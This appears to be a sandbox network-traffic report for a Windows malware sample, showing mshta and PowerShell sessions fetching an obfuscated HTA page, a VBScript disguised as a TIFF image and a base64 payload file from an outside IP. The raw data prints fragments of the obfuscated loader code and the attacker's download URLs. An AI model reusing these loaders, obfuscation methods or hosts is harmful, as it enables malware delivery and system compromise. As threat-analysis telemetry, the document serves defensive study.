25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 25 32 35 32 35 32 31 2d 2d 25 32 35 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 35 32 38 25 32 35 32 35 32 32 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 [TRUNCATED] Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%252522%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CsCripT%25252520typE%2525253D%25252522tEXT/vBscRipt%25252522%2525253E%2525250ADim%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520
Nov 20, 2024 07:49:58.566792965 CET	224	IN	Data Raw: 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 Data Ascii: %25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
Nov 20, 2024 07:49:58.566848993 CET	1236	IN	Data Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
Nov 20, 2024 07:49:58.566884041 CET	1236	IN	Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
Nov 20, 2024 07:49:58.566917896 CET	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 79 66 4a 6c 4d 5a 71 4c 6b 55 53 47 6d 55 54 4c 4c 71 6b 65 4f 52 4b 4d 4b 4e 6d 46 59 46 59 4d 4d 61 55 4f 77 4c 44 47 4a 59 66 74 76 61 43 47 6e 5a 6e 4f 6c 62 4c 56 7a 7a 47 43 4c 47 64 62 6e 73 62 52 56 Data Ascii: 2520%25252520yfJlMZqLkUSGmUTLLqkeORKMKNmFYFYMMaUOwLDGJYftvaCGnZnOlbLVzzGCLGdbnsbRVunuMBiYqljTYwmWCLyioCsORQTsRQfpwiWyjmdqkJqUGqjveeyVQDvlErXjnajcpignNLQruCyfZngifomDUkTOnsRToGnaODthoJyUgZkUSXeeTxrBpgLrhaaSKqtfiBjBAMbWKhZIacgdJMnkPYbQAxdApLEkLl
Nov 20, 2024 07:49:58.566952944 CET	1236	IN	Data Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
Nov 20, 2024 07:49:58.566987038 CET	1236	IN	Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
Nov 20, 2024 07:49:58.567020893 CET	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525
Nov 20, 2024 07:49:58.567054033 CET	1236	IN	Data Raw: 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 Data Ascii: 0%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525252
Nov 20, 2024 07:49:58.567087889 CET	1236	IN	Data Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 54 70 61 68 74 45 6a 53 4f 4f 7a 42 Data Ascii: 5252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520TpahtEjSOOzBqUkscmNknFcuRMiJlcnNmzGJzUlPPpiLbMJQciqEbFjIWJMPrqFltGJjciHRLtxpWosWqyWZZmEuWfeSUyChpEyNCPlIEUJtCVasVeWCJYclUWzZxWSldqmFDjNUuNefvcvMSUCxGhrPRdmtBdpfJKpSENZllTYId
Nov 20, 2024 07:49:58.572066069 CET	1236	IN	Data Raw: 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 Data Ascii: 2520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2525

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49164	192.3.22.13	80	3540	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 07:50:00.528765917 CET	457	OUT	GET /352/seethebestthingswithgreatsituationshandletotheprogress.hta HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.22.13 If-Range: "2c931-62740beac27e0"
Nov 20, 2024 07:50:01.056802034 CET	1236	IN	HTTP/1.1 206 Partial Content Date: Wed, 20 Nov 2024 06:50:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 19 Nov 2024 09:34:50 GMT ETag: "2c931-62740beac27e0" Accept-Ranges: bytes Content-Length: 173681 Content-Range: bytes 8896-182576/182577 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/hta Data Raw: 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 [TRUNCATED] Data Ascii: 520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
Nov 20, 2024 07:50:01.056818008 CET	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520TpahtEjSOOzBqUkscmNknFcuRMiJlcnNmzGJzUlPPpiLbMJQciqEbFjIWJMPrqFltGJjciHRLtxpWosWqyWZZmEuWfeSUyChpEyNCPlIEUJtCVasVeWCJYclUWzZxWSldqmFDjNUuNe
Nov 20, 2024 07:50:01.056828976 CET	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
Nov 20, 2024 07:50:01.056885958 CET	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
Nov 20, 2024 07:50:01.056898117 CET	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
Nov 20, 2024 07:50:01.056909084 CET	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
Nov 20, 2024 07:50:01.056921005 CET	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520set%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
Nov 20, 2024 07:50:01.056932926 CET	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%
Nov 20, 2024 07:50:01.056946039 CET	1236	IN	Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 Data Ascii: 52520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252
Nov 20, 2024 07:50:01.056958914 CET	1236	IN	Data Raw: 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 Data Ascii: 20%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%252525
Nov 20, 2024 07:50:01.061971903 CET	1236	IN	Data Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 30 25 32 Data Ascii: 25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49165	192.3.22.13	80	3656	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 07:50:08.947987080 CET	385	OUT	GET /xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.22.13 Connection: Keep-Alive
Nov 20, 2024 07:50:09.525754929 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 06:50:09 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 19 Nov 2024 09:31:08 GMT ETag: "22b12-62740b16a747a" Accept-Ranges: bytes Content-Length: 142098 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/tiff Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 64 00 65 00 73 00 63 00 61 00 62 00 69 00 64 00 6f 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 65 00 73 00 70 00 69 00 6e 00 65 00 74 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 6d 00 61 00 6c 00 68 00 61 00 64 00 6f 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 63 00 6f 00 6e 00 75 00 62 00 69 00 61 00 6c 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 64 00 65 00 73 00 63 00 6f 00 61 00 6c 00 68 00 6f 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 65 00 73 00 63 00 6f 00 61 00 6c 00 68 00 6f 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 65 00 73 00 70 00 69 00 6e 00 65 00 74 00 61 00 2c 00 20 00 6d 00 61 00 6c 00 68 00 61 00 64 00 6f 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 64 00 65 00 73 00 63 00 6f 00 61 00 6c 00 68 00 6f 00 20 00 3e 00 20 00 30 00 0d 00 0a 00 20 00 20 00 [TRUNCATED] Data Ascii: Function descabido(ByVal espineta, ByVal malhado, ByVal conubial) Dim descoalho descoalho = InStr(espineta, malhado) Do While descoalho > 0 espineta = Left(espineta, descoalho - 1) & conubial & Mid(espineta, descoalho + Len(malhado)) descoalho = InStr(descoalho + Len(conubial), espineta, malhado) Loop descabido = espinetaEnd Functionprivate function ReadStdIn() while Not stdIn.AtEndOfS
Nov 20, 2024 07:50:09.525798082 CET	224	IN	Data Raw: 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 3d 00 20 00 52 00 65 00 61 00 64 00 53 00 74 00 64 00 49 00 6e 00 20 00 26 00 20 00 73 00 74 Data Ascii: tream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not iodar() Then
Nov 20, 2024 07:50:09.525816917 CET	1236	IN	Data Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 4f 00 6e 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 52 00 65 00 73 00 75 00 6d 00 65 00 20 00 4e 00 65 00 78 00 74 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: On Error Resume Next ocluso = "KCdEcDNpbWFGZYVWJSALIPUXNQnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5
Nov 20, 2024 07:50:09.525912046 CET	1236	IN	Data Raw: 00 43 00 41 00 39 00 49 00 46 00 74 00 54 00 65 00 58 00 4e 00 30 00 5a 00 57 00 30 00 75 00 56 00 47 00 56 00 34 00 64 00 43 00 35 00 46 00 62 00 6d 00 4e 00 76 00 5a 00 47 00 6c 00 75 00 5a 00 31 00 30 00 36 00 4f 00 6c 00 56 00 55 00 52 00 6a Data Ascii: CA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8GZYVWJSALIPUXN
Nov 20, 2024 07:50:09.525928974 CET	1236	IN	Data Raw: 00 68 00 63 00 6e 00 51 00 6e 00 4b 00 79 00 64 00 47 00 4a 00 79 00 73 00 6e 00 62 00 47 00 46 00 6e 00 4c 00 6b 00 78 00 6c 00 62 00 6d 00 64 00 30 00 61 00 44 00 74 00 45 00 63 00 44 00 4e 00 69 00 59 00 58 00 4e 00 6c 00 4e 00 6a 00 52 00 4d Data Ascii: hcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJGZYVWJSALIPUXNQbmRleCAtIERwM3N0YXJ0SW5kZXg7GZYVWJSALIPUXNQRH
Nov 20, 2024 07:50:09.525949001 CET	672	IN	Data Raw: 00 78 00 76 00 59 00 57 00 51 00 6e 00 4b 00 79 00 64 00 6c 00 5a 00 45 00 46 00 7a 00 63 00 32 00 56 00 74 00 59 00 6d 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 78 00 35 00 49 00 44 00 30 00 67 Data Ascii: xvYWQnKydlZEFzc2VtYmGZYVWJSALIPUXNQx5ID0gGZYVWJSALIPUXNQW1N5c3RlbS5SZWZsZScrJ2N0aW" ocluso = ocluso & "9uLkFzc2V
Nov 20, 2024 07:50:09.525954962 CET	1236	IN	Data Raw: 00 6a 00 46 00 74 00 64 00 48 00 68 00 30 00 4c 00 6b 00 5a 00 53 00 52 00 6b 00 5a 00 53 00 56 00 79 00 38 00 79 00 4e 00 54 00 4d 00 76 00 4d 00 7a 00 45 00 75 00 4d 00 6a 00 49 00 75 00 4d 00 79 00 34 00 79 00 4f 00 54 00 45 00 76 00 4c 00 7a Data Ascii: jFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2GZYVWJSALIPUXNQYWRvRjGZYVWJSALIPUXNQFtLCBGJysnMW1kZXNh
Nov 20, 2024 07:50:09.525959969 CET	1236	IN	Data Raw: 00 6e 00 58 00 56 00 74 00 6a 00 61 00 47 00 46 00 53 00 58 00 54 00 4d 00 35 00 4b 00 53 00 35 00 53 00 52 00 58 00 42 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 73 00 59 00 57 00 4e 00 6c 00 4b Data Ascii: nXVtjaGFSXTM5KS5SRXBGZYVWJSALIPUXNQsYWNlKChbY2hhUl02OCtbY2hhUl0GZYVWJSALIPUXNQxMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYV
Nov 20, 2024 07:50:09.525966883 CET	1236	IN	Data Raw: 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 3d 00 20 00 27 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 Data Ascii: YVWJSALIPUXNQ= 'GZYVWJSALIPUXNQ" xantorreia = xantorreia & "GZYVWJSALIPUXNQ" & ocluso & "'GZYVWJSALIPUXNQ"
Nov 20, 2024 07:50:09.525973082 CET	104	IN	Data Raw: 00 61 00 20 00 3d 00 20 00 78 00 61 00 6e 00 74 00 6f 00 72 00 72 00 65 00 69 00 61 00 20 00 26 00 20 00 22 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 2e 00 65 00 47 00 5a 00 59 00 56 00 57 00 4a Data Ascii: a = xantorreia & "GZYVWJSALIPUXNQ.eGZYVWJSALIPUXNQnc
Nov 20, 2024 07:50:09.531028986 CET	1236	IN	Data Raw: 00 47 00 5a 00 59 00 56 00 57 00 4a 00 53 00 41 00 4c 00 49 00 50 00 55 00 58 00 4e 00 51 00 6f 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 78 00 61 00 6e 00 74 00 6f 00 72 00 72 00 65 00 69 00 61 00 20 00 3d 00 20 00 78 Data Ascii: GZYVWJSALIPUXNQo" xantorreia = xantorreia & "dGZYVWJSALIPUXNQinGZYVWJSALIPUXNQ" xantorreia = xantorreia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49167	192.3.22.13	80	2964	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 07:50:32.029369116 CET	75	OUT	GET /352/WRFFRF.txt HTTP/1.1 Host: 192.3.22.13 Connection: Keep-Alive
Nov 20, 2024 07:50:32.630189896 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 06:50:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Last-Modified: Tue, 19 Nov 2024 09:28:04 GMT ETag: "50000-62740a67be77d" Accept-Ranges: bytes Content-Length: 327680 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: 